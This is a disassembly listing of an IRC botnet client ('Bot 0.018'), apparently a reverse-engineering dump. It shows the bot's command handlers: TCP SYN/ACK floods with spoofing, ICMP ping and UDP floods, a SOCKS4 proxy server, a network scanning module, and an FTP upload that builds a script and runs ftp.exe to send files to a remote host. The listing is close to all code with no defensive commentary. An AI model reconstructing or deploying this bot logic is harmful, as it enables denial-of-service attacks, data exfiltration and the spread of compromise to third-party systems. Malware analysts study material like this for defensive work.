loc_40BF8F: ; CODE XREF: sub_4078FA+468C�j
lea eax, [ebp+var_2E0]
push offset aThreadsListThr ; "[THREADS]: List threads."
push eax
call sub_412BB5
xor esi, esi
push esi
lea eax, [ebp+var_2E0]
push 20h
push eax
call sub_410EEA
add esp, 14h
mov [ebp+var_2F4], eax
lea eax, [ebp+var_18]
push eax
push esi
lea eax, [ebp+var_378]
push eax
push offset sub_4111EB
push esi
push esi
call ds:dword_41F00C ; CreateThread
mov ecx, [ebp+var_2F4]
imul ecx, 234h
cmp eax, esi
mov dword_43434C[ecx], eax
jnz short loc_40C011
call ds:dword_41F008 ; RtlGetLastWin32Error
push eax
lea eax, [ebp+var_2E0]
push offset aThreadsFaile_0 ; "[THREADS]: Failed to start list thread,"...
push eax
call sub_412BB5
add esp, 0Ch
jmp loc_409015
; ---------------------------------------------------------------------------
loc_40C009: ; CODE XREF: sub_4078FA+471D�j
push 32h
call ds:dword_41F000 ; Sleep
loc_40C011: ; CODE XREF: sub_4078FA+46ED�j
cmp [ebp+var_2E4], esi
jz short loc_40C009
jmp loc_409015
; ---------------------------------------------------------------------------
loc_40C01E: ; CODE XREF: sub_4078FA+117F�j
; sub_4078FA+1193�j
push offset aBot018 ; "Bot018"
lea eax, [ebp+var_2E0]
push offset aMainBotIdS_ ; "[MAIN]: Bot ID: %s."
push eax
call sub_412BB5
push 0
push [ebp+var_4]
lea eax, [ebp+var_2E0]
push eax
push [ebp+var_9C]
push [ebp+arg_4]
call sub_4045DD
add esp, 20h
jmp loc_409015
; ---------------------------------------------------------------------------
loc_40C056: ; CODE XREF: sub_4078FA+1157�j
; sub_4078FA+116B�j
push dword_479BB0
call sub_40FD16
push eax
lea eax, [ebp+var_2E0]
push offset aMainStatusRead ; "[MAIN]: Status: Ready. Bot Uptime: %s."
push eax
call sub_412BB5
push 0
push [ebp+var_4]
lea eax, [ebp+var_2E0]
push eax
push [ebp+var_9C]
push [ebp+arg_4]
call sub_4045DD
add esp, 24h
jmp loc_409015
; ---------------------------------------------------------------------------
loc_40C095: ; CODE XREF: sub_4078FA+112F�j
; sub_4078FA+1143�j
mov ebx, [ebp+ebx+var_A0]
test ebx, ebx
jz short loc_40C0C8
cmp [ebp+var_14], 0
jz short loc_40C0D7
push ebx
push [ebp+var_14]
call sub_413920
test eax, eax
pop ecx
pop ecx
jz short loc_40C0D7
push eax
push offset aQuitS ; "QUIT :%s\r\n"
push [ebp+arg_4]
call sub_404592
add esp, 0Ch
jmp short loc_40C0D7
; ---------------------------------------------------------------------------
loc_40C0C8: ; CODE XREF: sub_4078FA+47A4�j
push offset aQuitLater ; "QUIT :later\r\n"
push [ebp+arg_4]
call sub_404592
pop ecx
pop ecx
loc_40C0D7: ; CODE XREF: sub_4078FA+47AA�j
; sub_4078FA+47B9�j ...
push 0FFFFFFFEh
pop eax
jmp loc_407B7E
; ---------------------------------------------------------------------------
loc_40C0DF: ; CODE XREF: sub_4078FA+1107�j
; sub_4078FA+111B�j
push offset aQuitDisconnect ; "QUIT :disconnecting\r\n"
push [ebp+arg_4]
call sub_404592
push offset aMainDisconnect ; "[MAIN]: Disconnecting."
call sub_401C33
add esp, 0Ch
or eax, 0FFFFFFFFh
jmp loc_407B7E
; ---------------------------------------------------------------------------
loc_40C101: ; CODE XREF: sub_4078FA+10DF�j
; sub_4078FA+10F3�j
push offset aQuitReconnecti ; "QUIT :reconnecting\r\n"
push [ebp+arg_4]
call sub_404592
push offset aMainReconnecti ; "[MAIN]: Reconnecting."
call sub_401C33
add esp, 0Ch
xor eax, eax
jmp loc_407B7E
; ---------------------------------------------------------------------------
loc_40C122: ; CODE XREF: sub_4078FA+10B7�j
; sub_4078FA+10CB�j
push [ebp+var_4]
push [ebp+var_9C]
push [ebp+arg_4]
call sub_401000
loc_40C133: ; CODE XREF: sub_4078FA+2F6D�j
add esp, 0Ch
jmp loc_40CFE2
; ---------------------------------------------------------------------------
loc_40C13B: ; CODE XREF: sub_4078FA+1017�j
; sub_4078FA+102B�j
push [ebp+ebx+var_A0]
push 1Fh
push offset aProcessList ; "Process list"
push offset aProc ; "[PROC]"
loc_40C14E: ; CODE XREF: sub_4078FA+E54�j
; sub_4078FA+E7C�j ...
push [ebp+var_C]
push [ebp+var_4]
push [ebp+var_9C]
push [ebp+arg_4]
call sub_411120
add esp, 20h
jmp loc_407B7B
; ---------------------------------------------------------------------------
loc_40C16A: ; CODE XREF: sub_4078FA+E17�j
; sub_4078FA+E2B�j
mov esi, [ebp+ebx+var_A0]
test esi, esi
jz short loc_40C189
push esi
call sub_412F42
test eax, eax
pop ecx
jz short loc_40C189
push esi
call sub_412F42
pop ecx
jmp short loc_40C18E
; ---------------------------------------------------------------------------
loc_40C189: ; CODE XREF: sub_4078FA+4879�j
; sub_4078FA+4884�j
mov eax, dword_42AE40
loc_40C18E: ; CODE XREF: sub_4078FA+488D�j
mov ebx, [ebp+ebx+var_9C]
xor edi, edi
cmp ebx, edi
mov [ebp+var_2FC], eax
jz short loc_40C1B5
push ebx
loc_40C1A2: ; CODE XREF: sub_4078FA+48CB�j
lea eax, [ebp+var_30C]
push 10h
push eax
call sub_412E0D
add esp, 0Ch
jmp short loc_40C1CE
; ---------------------------------------------------------------------------
loc_40C1B5: ; CODE XREF: sub_4078FA+48A5�j
cmp [ebp+var_44B], 0
jz short loc_40C1C7
lea eax, [ebp+var_E0]
push eax
jmp short loc_40C1A2
; ---------------------------------------------------------------------------
loc_40C1C7: ; CODE XREF: sub_4078FA+48C2�j
and [ebp+var_30C], 0
loc_40C1CE: ; CODE XREF: sub_4078FA+48B9�j
mov eax, [ebp+var_4]
push [ebp+var_9C]
mov esi, [ebp+arg_4]
mov [ebp+var_2F0], eax
mov eax, [ebp+var_C]
mov [ebp+var_2EC], eax
lea eax, [ebp+var_38C]
push 80h
push eax
mov [ebp+var_390], esi
call sub_412E0D
add esp, 0Ch
push [ebp+var_2FC]
push esi
call sub_406C33
pop ecx
push eax
lea eax, [ebp+var_2E0]
push offset aSocks4ServerSt ; "[SOCKS4]: Server started on: %s:%d."
push eax
call sub_412BB5
push edi
lea eax, [ebp+var_2E0]
push 12h
push eax
call sub_410EEA
add esp, 1Ch
mov [ebp+var_2F8], eax
lea eax, [ebp+var_18]
push eax
push edi
lea eax, [ebp+var_390]
push eax
push offset sub_40FB2A
push edi
push edi
call ds:dword_41F00C ; CreateThread
mov ecx, [ebp+var_2F8]
imul ecx, 234h
cmp eax, edi
mov dword_43434C[ecx], eax
jnz short loc_40C282
call ds:dword_41F008 ; RtlGetLastWin32Error
push eax
push offset aSocks4FailedTo ; "[SOCKS4]: Failed to start server thread"...
jmp loc_40D19B
; ---------------------------------------------------------------------------
loc_40C27A: ; CODE XREF: sub_4078FA+498E�j
push 32h
call ds:dword_41F000 ; Sleep
loc_40C282: ; CODE XREF: sub_4078FA+496D�j
cmp [ebp+var_2E8], edi
jz short loc_40C27A
jmp loc_407B7B
; ---------------------------------------------------------------------------
loc_40C28F: ; CODE XREF: sub_4078FA+DC7�j
; sub_4078FA+DDB�j ...
push 7
mov edi, eax
mov esi, offset aSecure ; "secure"
pop ecx
xor edx, edx
repe cmpsb
jz short loc_40C2B7
mov edi, eax
push 4
mov esi, offset aSec ; "sec"
pop ecx
xor eax, eax
repe cmpsb
jz short loc_40C2B7
and [ebp+var_3BC], eax
jmp short loc_40C2C1
; ---------------------------------------------------------------------------
loc_40C2B7: ; CODE XREF: sub_4078FA+49A3�j
; sub_4078FA+49B3�j
mov [ebp+var_3BC], 1
loc_40C2C1: ; CODE XREF: sub_4078FA+49BB�j
push [ebp+var_9C]
lea eax, [ebp+var_440]
push 80h
push eax
call sub_412E0D
mov eax, [ebp+arg_4]
mov [ebp+var_444], eax
mov eax, [ebp+var_4]
mov [ebp+var_3B8], eax
mov eax, [ebp+var_C]
xor esi, esi
add esp, 0Ch
cmp [ebp+var_3BC], esi
mov [ebp+var_3B4], eax
mov eax, offset aSecuring ; "Securing"
jnz short loc_40C30A
mov eax, offset aUnsecuring ; "Unsecuring"
loc_40C30A: ; CODE XREF: sub_4078FA+4A09�j
push eax
push offset aSecureSSystem_ ; "[SECURE]: %s system."
lea eax, [ebp+var_2E0]
push 200h
push eax
call sub_412E0D
push esi
lea eax, [ebp+var_2E0]
push 1Ah
push eax
call sub_410EEA
add esp, 1Ch
mov [ebp+var_3C0], eax
lea eax, [ebp+var_18]
push eax
push esi
lea eax, [ebp+var_444]
push eax
push offset sub_40F023
push esi
push esi
call ds:dword_41F00C ; CreateThread
mov ecx, [ebp+var_3C0]
imul ecx, 234h
cmp eax, esi
mov dword_43434C[ecx], eax
jnz short loc_40C390
call ds:dword_41F008 ; RtlGetLastWin32Error
push eax
lea eax, [ebp+var_2E0]
push offset aSecureFailedTo ; "[SECURE]: Failed to start secure thread"...
push eax
call sub_412BB5
add esp, 0Ch
jmp loc_40C4A1
; ---------------------------------------------------------------------------
loc_40C388: ; CODE XREF: sub_4078FA+4A9C�j
push 32h
call ds:dword_41F000 ; Sleep
loc_40C390: ; CODE XREF: sub_4078FA+4A6C�j
cmp [ebp+var_3B0], esi
jz short loc_40C388
jmp loc_40C4A1
; ---------------------------------------------------------------------------
loc_40C39D: ; CODE XREF: sub_4078FA+D9F�j
; sub_4078FA+DB3�j
push offset aBot0_018 ; "[Bot 0.018]"
lea eax, [ebp+var_2E0]
push offset aMainS ; "[MAIN]: %s"
push eax
call sub_412BB5
loc_40C3B3: ; CODE XREF: sub_4078FA+41AD�j
add esp, 0Ch
jmp loc_40AEAA
; ---------------------------------------------------------------------------
loc_40C3BB: ; CODE XREF: sub_4078FA+D77�j
; sub_4078FA+D8B�j
mov ebx, [ebp+ebx+var_A0]
test ebx, ebx
jz short loc_40C413
push ebx
call sub_412F42
test eax, eax
pop ecx
jl short loc_40C40B
cmp eax, 2
jge short loc_40C40B
mov edx, [ebp+arg_18]
mov ecx, eax
shl ecx, 7
lea esi, [ecx+edx]
cmp byte ptr [esi], 0
jz short loc_40C403
lea eax, [esi+1]
push eax
lea eax, [ebp+var_2E0]
push offset aMainUserSLogge ; "[MAIN]: User %s logged out."
push eax
call sub_412BB5
add esp, 0Ch
and byte ptr [esi], 0
jmp short loc_40C47E
; ---------------------------------------------------------------------------
loc_40C403: ; CODE XREF: sub_4078FA+4AEA�j
push eax
push offset aMainNoUserLogg ; "[MAIN]: No user logged in at slot: %d."
jmp short loc_40C46F
; ---------------------------------------------------------------------------
loc_40C40B: ; CODE XREF: sub_4078FA+4AD5�j
; sub_4078FA+4ADA�j
push eax
push offset aMainInvalidLog ; "[MAIN]: Invalid login slot number: %d."
jmp short loc_40C46F
; ---------------------------------------------------------------------------
loc_40C413: ; CODE XREF: sub_4078FA+4ACA�j
mov edx, [ebp+arg_18]
xor edi, edi
loc_40C418: ; CODE XREF: sub_4078FA+4B5B�j
mov esi, [ebp+var_A4]
mov eax, edx
loc_40C420: ; CODE XREF: sub_4078FA+4B42�j
mov bl, [eax]
mov cl, bl
cmp bl, [esi]
jnz short loc_40C442
test cl, cl
jz short loc_40C43E
mov bl, [eax+1]
mov cl, bl
cmp bl, [esi+1]
jnz short loc_40C442
inc eax
inc eax
inc esi
inc esi
test cl, cl
jnz short loc_40C420
loc_40C43E: ; CODE XREF: sub_4078FA+4B30�j
xor eax, eax
jmp short loc_40C447
; ---------------------------------------------------------------------------
loc_40C442: ; CODE XREF: sub_4078FA+4B2C�j
; sub_4078FA+4B3A�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_40C447: ; CODE XREF: sub_4078FA+4B46�j
test eax, eax
jz short loc_40C459
inc edi
add edx, 80h
cmp edi, 2
jl short loc_40C418
jmp short loc_40C47E
; ---------------------------------------------------------------------------
loc_40C459: ; CODE XREF: sub_4078FA+4B4F�j
mov eax, [ebp+arg_18]
shl edi, 7
and byte ptr [edi+eax], 0
lea eax, [ebp+var_E0]
push eax
push offset aMainUserSLogge ; "[MAIN]: User %s logged out."
loc_40C46F: ; CODE XREF: sub_4078FA+3780�j
; sub_4078FA+4B0F�j ...
lea eax, [ebp+var_2E0]
push eax
call sub_412BB5
add esp, 0Ch
loc_40C47E: ; CODE XREF: sub_4078FA+2B08�j
; sub_4078FA+2B2C�j ...
cmp [ebp+var_C], 0
jnz short loc_40C4A1
push 0
loc_40C486: ; CODE XREF: sub_4078FA+4FD0�j
; sub_4078FA+5113�j
push [ebp+var_4]
lea eax, [ebp+var_2E0]
push eax
push [ebp+var_9C]
push [ebp+arg_4]
loc_40C499: ; CODE XREF: sub_4078FA+2611�j
; sub_4078FA+2733�j ...
call sub_4045DD
add esp, 14h
loc_40C4A1: ; CODE XREF: sub_4078FA+11E6�j
; sub_4078FA+25FB�j ...
xor esi, esi
inc esi
jmp loc_409018
; ---------------------------------------------------------------------------
loc_40C4A9: ; CODE XREF: sub_4078FA+D4F�j
; sub_4078FA+D63�j
mov edi, [ebp+var_A0]
push 4
mov esi, offset dword_4263EC
pop ecx
xor edx, edx
repe cmpsb
jz loc_408D7C
call sub_41105B
loc_40C4C6: ; CODE XREF: sub_4078FA+4497�j
push 0
call ds:dword_41F02C ; ExitProcess
loc_40C4CE: ; CODE XREF: sub_4078FA+156A�j
push 8
mov edi, eax
mov esi, offset aHttpcon ; "httpcon"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C685
push 5
mov edi, eax
mov esi, offset aHcon ; "hcon"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C685
cmp [ebp+ebx+var_90], edx
jz loc_407B7B
mov edi, eax
push 7
mov esi, offset aUpload ; "upload"
pop ecx
xor eax, eax
repe cmpsb
jnz loc_40CFE2
mov edi, [ebp+ebx+var_90]
push 4
push edi
call sub_40241F
test eax, eax
pop ecx
pop ecx
jnz short loc_40C546
push edi
push offset aFtpFileNotFoun ; "[FTP]: File not found: %s."
loc_40C532: ; CODE XREF: sub_4078FA+38A4�j
lea eax, [ebp+var_2E0]
push eax
call sub_412BB5
add esp, 0Ch
jmp loc_40ABC7
; ---------------------------------------------------------------------------
loc_40C546: ; CODE XREF: sub_4078FA+4C30�j
call ds:dword_41F004 ; GetTickCount
push eax
call sub_412D64
pop ecx
call sub_412D71
push 9
cdq
pop ecx
idiv ecx
push edx
call sub_412D71
push 63h
cdq
pop ecx
idiv ecx
push edx
call sub_412D71
cdq
mov ecx, 3E7h
idiv ecx
lea eax, [ebp+var_15E8]
push edx
push eax
lea eax, [ebp+var_1344]
push offset aSIII_dll ; "%s\\%i%i%i.dll"
push eax
call sub_412BB5
lea eax, [ebp+var_1344]
push offset aAb ; "ab"
push eax
call sub_413393
add esp, 20h
test eax, eax
mov [ebp+arg_0], eax
jz loc_407B7B
mov esi, [ebp+ebx+var_A0]
push edi
push [ebp+var_14]
push [ebp+ebx+var_98]
push [ebp+ebx+var_9C]
push esi
push offset aOpenSSSSPutSBy ; "open %s\r\n%s\r\n%s\r\n%s\r\nput %s\r\nbye\r\n"
push eax
call sub_41414F
push [ebp+arg_0]
call sub_412F93
lea eax, [ebp+var_1344]
push eax
lea eax, [ebp+var_B70]
push offset aSS_3 ; "-s:%s"
push eax
call sub_412BB5
add esp, 2Ch
xor eax, eax
push eax
push eax
lea ecx, [ebp+var_B70]
push ecx
push offset aFtp_exe ; "ftp.exe"
push offset aOpen ; "open"
push eax
call dword_4335A8 ; ShellExecuteA
test eax, eax
push esi
push edi
jz short loc_40C621
push offset aFtpUploadingFi ; "[FTP]: Uploading file: %s to: %s"
jmp short loc_40C626
; ---------------------------------------------------------------------------
loc_40C621: ; CODE XREF: sub_4078FA+4D1E�j
push offset aFtpUploading_0 ; "[FTP]: Uploading file: %s to: %s failed"...
loc_40C626: ; CODE XREF: sub_4078FA+4D25�j
call sub_412BB5
add esp, 0Ch
cmp [ebp+var_C], 0
jnz short loc_40C651
push 0
push [ebp+var_4]
lea eax, [ebp+var_2E0]
push eax
push [ebp+var_9C]
push [ebp+arg_4]
call sub_4045DD
add esp, 14h
loc_40C651: ; CODE XREF: sub_4078FA+4D38�j
lea eax, [ebp+var_2E0]
push eax
call sub_401C33
jmp short loc_40C66B
; ---------------------------------------------------------------------------
loc_40C65F: ; CODE XREF: sub_4078FA+4D84�j
lea eax, [ebp+var_1344]
push eax
call sub_414125
loc_40C66B: ; CODE XREF: sub_4078FA+4D63�j
lea eax, [ebp+var_1344]
push 4
push eax
call sub_40241F
add esp, 0Ch
test eax, eax
jnz short loc_40C65F
jmp loc_407B7B
; ---------------------------------------------------------------------------
loc_40C685: ; CODE XREF: sub_4078FA+4BE2�j
; sub_4078FA+4BF6�j
push [ebp+ebx+var_90]
push [ebp+var_14]
push [ebp+ebx+var_98]
push [ebp+ebx+var_9C]
call sub_412F42
pop ecx
push eax
push [ebp+ebx+var_A0]
push [ebp+var_C]
push [ebp+var_4]
push [ebp+var_9C]
push [ebp+arg_4]
call sub_4038B7
jmp loc_40CFDF
; ---------------------------------------------------------------------------
loc_40C6C4: ; CODE XREF: sub_4078FA+1542�j
; sub_4078FA+1556�j
push [ebp+ebx+var_A0]
lea eax, [ebp+var_998]
push 80h
push eax
call sub_412E0D
add esp, 0Ch
push 4
lea edi, [ebp+var_998]
mov esi, offset aSyn_0 ; "syn"
pop ecx
xor eax, eax
repe cmpsb
jz short loc_40C725
push 4
lea edi, [ebp+var_998]
mov esi, offset aAck ; "ack"
pop ecx
xor eax, eax
repe cmpsb
jz short loc_40C725
push 7
lea edi, [ebp+var_998]
mov esi, offset aRandom_0 ; "random"
pop ecx
xor eax, eax
repe cmpsb
jz short loc_40C725
push offset aTcpInvalidFloo ; "[TCP]: Invalid flood type specified."
jmp loc_40B61E
; ---------------------------------------------------------------------------
loc_40C725: ; CODE XREF: sub_4078FA+4DF7�j
; sub_4078FA+4E0B�j ...
push [ebp+var_14]
call sub_412F42
xor edi, edi
cmp eax, edi
pop ecx
mov [ebp+var_888], eax
jle loc_40C8AD
mov eax, [ebp+ebx+var_A0]
push eax
mov [ebp+var_8], eax
mov esi, 80h
lea eax, [ebp+var_998]
push esi
push eax
call sub_412E0D
mov eax, [ebp+ebx+var_9C]
push eax
mov [ebp+var_10], eax
lea eax, [ebp+var_A18]
push esi
push eax
call sub_412E0D
mov eax, [ebp+ebx+var_98]
push eax
mov [ebp+arg_0], eax
call sub_412F42
mov [ebp+var_894], eax
mov eax, [ebp+ebx+var_90]
add esp, 1Ch
cmp eax, edi
jz short loc_40C7A6
push eax
call sub_412F42
pop ecx
mov [ebp+var_890], eax
jmp short loc_40C7AC
; ---------------------------------------------------------------------------
loc_40C7A6: ; CODE XREF: sub_4078FA+4E9B�j
mov [ebp+var_890], edi
loc_40C7AC: ; CODE XREF: sub_4078FA+4EAA�j
mov ebx, [ebp+ebx+var_8C]
cmp ebx, edi
jz short loc_40C7C6
push ebx
call sub_412F42
pop ecx
mov [ebp+var_88C], eax
jmp short loc_40C7CC
; ---------------------------------------------------------------------------
loc_40C7C6: ; CODE XREF: sub_4078FA+4EBB�j
mov [ebp+var_88C], edi
loc_40C7CC: ; CODE XREF: sub_4078FA+4ECA�j
push [ebp+var_9C]
xor eax, eax
cmp [ebp+var_43A], al
push esi
setnz al
mov [ebp+var_884], eax
mov eax, [ebp+arg_4]
mov [ebp+var_A1C], eax
lea eax, [ebp+var_918]
push eax
call sub_412E0D
mov eax, [ebp+var_4]
mov [ebp+var_880], eax
mov eax, [ebp+var_C]
add esp, 0Ch
cmp [ebp+var_884], edi
mov [ebp+var_87C], eax
mov eax, offset aSpoofed ; "Spoofed"
jnz short loc_40C820
mov eax, offset aNormal ; "Normal"
loc_40C820: ; CODE XREF: sub_4078FA+4F1F�j
push [ebp+var_14]
push [ebp+arg_0]
push [ebp+var_10]
push [ebp+var_8]
push eax
push offset aTcpSSFloodingS ; "[TCP]: %s %s flooding: (%s:%s) for %s s"...
lea eax, [ebp+var_2E0]
push 200h
push eax
call sub_412E0D
push edi
lea eax, [ebp+var_2E0]
push 0Dh
push eax
call sub_410EEA
add esp, 2Ch
mov [ebp+var_898], eax
lea eax, [ebp+var_18]
push eax
push edi
lea eax, [ebp+var_A1C]
push eax
push offset sub_41046C
push edi
push edi
call ds:dword_41F00C ; CreateThread
mov ecx, [ebp+var_898]
imul ecx, 234h
cmp eax, edi
mov dword_43434C[ecx], eax
jnz short loc_40C8A3
call ds:dword_41F008 ; RtlGetLastWin32Error
push eax
push offset aTcpFailedToSta ; "[TCP]: Failed to start flood thread, er"...
jmp loc_40B73B
; ---------------------------------------------------------------------------
loc_40C89B: ; CODE XREF: sub_4078FA+4FAF�j
push 32h
call ds:dword_41F000 ; Sleep
loc_40C8A3: ; CODE XREF: sub_4078FA+4F8E�j
cmp [ebp+var_878], edi
jz short loc_40C89B
jmp short loc_40C8C0
; ---------------------------------------------------------------------------
loc_40C8AD: ; CODE XREF: sub_4078FA+4E3E�j
push offset aTcpInvalidFl_0 ; "[TCP]: Invalid flood time must be great"...
loc_40C8B2: ; CODE XREF: sub_4078FA+53D4�j
; sub_4078FA+5490�j
lea eax, [ebp+var_2E0]
push eax
call sub_412BB5
loc_40C8BE: ; CODE XREF: sub_4078FA+3D32�j
pop ecx
pop ecx
loc_40C8C0: ; CODE XREF: sub_4078FA+3E50�j
; sub_4078FA+3E65�j ...
cmp [ebp+var_C], edi
jnz loc_40C4A1
push edi
jmp loc_40C486
; ---------------------------------------------------------------------------
loc_40C8CF: ; CODE XREF: sub_4078FA+1506�j
; sub_4078FA+151A�j ...
cmp dword_433620, 0
jnz loc_40C9E8
mov eax, [ebp+var_C]
mov [ebp+var_758], eax
mov eax, [ebp+var_4]
push 7Fh
push [ebp+ebx+var_A0]
mov [ebp+var_75C], eax
lea eax, [ebp+var_7F0]
push eax
call sub_412C40
push [ebp+ebx+var_9C]
call sub_412F42
push [ebp+ebx+var_98]
mov [ebp+var_770], eax
call sub_412F42
push [ebp+var_14]
mov [ebp+var_76C], eax
call sub_412F42
push 7Fh
push [ebp+var_9C]
mov [ebp+var_768], eax
lea eax, [ebp+var_870]
push eax
call sub_412C40
push [ebp+var_768]
mov eax, [ebp+arg_4]
push [ebp+var_76C]
mov [ebp+var_874], eax
lea eax, [ebp+var_7F0]
push eax
push [ebp+var_770]
lea eax, [ebp+var_2E0]
push offset aPingSendingDPi ; "[PING]: Sending %d pings to %s. packet "...
push eax
call sub_412BB5
xor esi, esi
push esi
lea eax, [ebp+var_2E0]
push 0Fh
push eax
call sub_410EEA
add esp, 48h
mov [ebp+var_760], eax
lea eax, [ebp+var_18]
push eax
push esi
lea eax, [ebp+var_874]
push eax
push offset sub_406CD9
push esi
push esi
call ds:dword_41F00C ; CreateThread
mov ecx, [ebp+var_760]
imul ecx, 234h
cmp eax, esi
mov dword_43434C[ecx], eax
jnz short loc_40C9DE
call ds:dword_41F008 ; RtlGetLastWin32Error
push eax
push offset aPingFailedToSt ; "[PING]: Failed to start flood thread, e"...
jmp loc_40CF6C
; ---------------------------------------------------------------------------
loc_40C9D6: ; CODE XREF: sub_4078FA+50EA�j
push 32h
call ds:dword_41F000 ; Sleep
loc_40C9DE: ; CODE XREF: sub_4078FA+50C9�j
cmp [ebp+var_754], esi
jz short loc_40C9D6
jmp short loc_40CA03
; ---------------------------------------------------------------------------
loc_40C9E8: ; CODE XREF: sub_4078FA+4FDC�j
push 1FFh
lea eax, [ebp+var_2E0]
push offset aIcmp_dllNotAva ; "ICMP.dll not available"
push eax
call sub_412C40
add esp, 0Ch
xor esi, esi
loc_40CA03: ; CODE XREF: sub_4078FA+3D0E�j
; sub_4078FA+50EC�j ...
cmp [ebp+var_C], esi
jnz loc_40C4A1
push esi
jmp loc_40C486
; ---------------------------------------------------------------------------
loc_40CA12: ; CODE XREF: sub_4078FA+14CA�j
; sub_4078FA+14DE�j ...
mov eax, [ebp+var_C]
mov edi, [ebp+var_4]
push 7Fh
push [ebp+ebx+var_A0]
mov [ebp+var_758], eax
lea eax, [ebp+var_7F0]
push eax
mov [ebp+var_75C], edi
call sub_412C40
push [ebp+ebx+var_9C]
call sub_412F42
push [ebp+ebx+var_98]
mov [ebp+var_770], eax
call sub_412F42
push [ebp+var_14]
mov [ebp+var_76C], eax
call sub_412F42
mov ebx, [ebp+ebx+var_90]
xor esi, esi
add esp, 18h
cmp ebx, esi
mov [ebp+var_768], eax
jz short loc_40CA8A
push ebx
call sub_412F42
pop ecx
mov [ebp+var_764], eax
jmp short loc_40CA90
; ---------------------------------------------------------------------------
loc_40CA8A: ; CODE XREF: sub_4078FA+517F�j
mov [ebp+var_764], esi
loc_40CA90: ; CODE XREF: sub_4078FA+518E�j
push 7Fh
push [ebp+var_9C]
lea eax, [ebp+var_870]
push eax
call sub_412C40
push [ebp+var_768]
mov ebx, [ebp+arg_4]
push [ebp+var_76C]
lea eax, [ebp+var_7F0]
push eax
push [ebp+var_770]
lea eax, [ebp+var_2E0]
push offset aUdpSendingDPac ; "[UDP]: Sending %d packets to: %s. Packe"...
push eax
mov [ebp+var_874], ebx
call sub_412BB5
push esi
lea eax, [ebp+var_2E0]
push 10h
push eax
call sub_410EEA
add esp, 30h
mov [ebp+var_760], eax
lea eax, [ebp+var_18]
push eax
push esi
lea eax, [ebp+var_874]
push eax
push offset sub_406E62
push esi
push esi
call ds:dword_41F00C ; CreateThread
mov ecx, [ebp+var_760]
imul ecx, 234h
cmp eax, esi
mov dword_43434C[ecx], eax
jnz short loc_40CB5F
call ds:dword_41F008 ; RtlGetLastWin32Error
push eax
lea eax, [ebp+var_2E0]
push offset aUdpFailedToSta ; "[UDP]: Failed to start flood thread, er"...
push eax
call sub_412BB5
add esp, 0Ch
loc_40CB39: ; CODE XREF: sub_4078FA+526D�j
cmp [ebp+var_C], esi
jnz loc_40C4A1
push esi
push edi
loc_40CB44: ; CODE XREF: sub_4078FA+2AD4�j
lea eax, [ebp+var_2E0]
push eax
push [ebp+var_9C]
push ebx
jmp loc_40C499
; ---------------------------------------------------------------------------
loc_40CB57: ; CODE XREF: sub_4078FA+526B�j
push 32h
call ds:dword_41F000 ; Sleep
loc_40CB5F: ; CODE XREF: sub_4078FA+5222�j
cmp [ebp+var_754], esi
jz short loc_40CB57
jmp short loc_40CB39
; ---------------------------------------------------------------------------
loc_40CB69: ; CODE XREF: sub_4078FA+14A2�j
; sub_4078FA+14B6�j
push 9
call sub_4110DA
mov esi, [ebp+ebx+var_9C]
push esi
mov edi, eax
call sub_412F42
add eax, edi
cmp eax, 258h
pop ecx
pop ecx
jle short loc_40CBBB
push edi
lea eax, [ebp+var_2E0]
push offset aScanAlreadyDSc ; "[SCAN]: Already %d scanning threads. To"...
push eax
call sub_412BB5
push 0
push [ebp+var_4]
lea eax, [ebp+var_2E0]
push eax
push [ebp+var_9C]
push [ebp+arg_4]
call sub_4045DD
jmp loc_40AB80
; ---------------------------------------------------------------------------
loc_40CBBB: ; CODE XREF: sub_4078FA+528E�j
push [ebp+ebx+var_A0]
call sub_412F42
push esi
mov [ebp+var_4E4], eax
call sub_412F42
push [ebp+ebx+var_98]
mov [ebp+var_4CC], eax
call sub_412F42
add esp, 0Ch
cmp eax, 5
mov [ebp+var_4E0], eax
jnb short loc_40CBFC
push 5
pop eax
mov [ebp+var_4E0], eax
loc_40CBFC: ; CODE XREF: sub_4078FA+52F7�j
push 3Ch
pop ecx
cmp eax, ecx
jbe short loc_40CC09
mov [ebp+var_4E0], ecx
loc_40CC09: ; CODE XREF: sub_4078FA+5307�j
push [ebp+var_14]
call sub_412F42
mov [ebp+var_4DC], eax
mov eax, 320h
cmp [ebp+var_4DC], eax
pop ecx
jbe short loc_40CC2B
mov [ebp+var_4DC], eax
loc_40CC2B: ; CODE XREF: sub_4078FA+5329�j
push [ebp+arg_4]
or [ebp+var_4C8], 0FFFFFFFFh
call sub_406C33
pop ecx
lea edx, [ebp+var_66C]
loc_40CC41: ; CODE XREF: sub_4078FA+534F�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40CC41
xor edi, edi
cmp dword_42A068, edi
mov [ebp+var_5EC], edi
mov [ebp+var_10], edi
jz short loc_40CCC1
mov ecx, offset dword_42A068
loc_40CC63: ; CODE XREF: sub_4078FA+53A7�j
mov edi, [ebp+ebx+var_A0]
lea esi, [ecx-28h]
loc_40CC6D: ; CODE XREF: sub_4078FA+538F�j
mov dl, [esi]
mov al, dl
cmp dl, [edi]
jnz short loc_40CC8F
test al, al
jz short loc_40CC8B
mov dl, [esi+1]
mov al, dl
cmp dl, [edi+1]
jnz short loc_40CC8F
inc esi
inc esi
inc edi
inc edi
test al, al
jnz short loc_40CC6D
loc_40CC8B: ; CODE XREF: sub_4078FA+537D�j
xor eax, eax
jmp short loc_40CC94
; ---------------------------------------------------------------------------
loc_40CC8F: ; CODE XREF: sub_4078FA+5379�j
; sub_4078FA+5387�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_40CC94: ; CODE XREF: sub_4078FA+5393�j
test eax, eax
jz short loc_40CCA5
inc [ebp+var_10]
add ecx, 3Ch
cmp dword ptr [ecx], 0
jnz short loc_40CC63
jmp short loc_40CCBF
; ---------------------------------------------------------------------------
loc_40CCA5: ; CODE XREF: sub_4078FA+539C�j
mov eax, [ebp+var_10]
mov ecx, eax
imul ecx, 3Ch
mov ecx, dword_42A068[ecx]
mov [ebp+var_4E4], ecx
mov [ebp+var_4C8], eax
loc_40CCBF: ; CODE XREF: sub_4078FA+53A9�j
xor edi, edi
loc_40CCC1: ; CODE XREF: sub_4078FA+5362�j
cmp [ebp+var_4E4], edi
jnz short loc_40CCD3
push offset aScanFailedTo_1 ; "[SCAN]: Failed to start scan, port is i"...
jmp loc_40C8B2
; ---------------------------------------------------------------------------
loc_40CCD3: ; CODE XREF: sub_4078FA+53CD�j
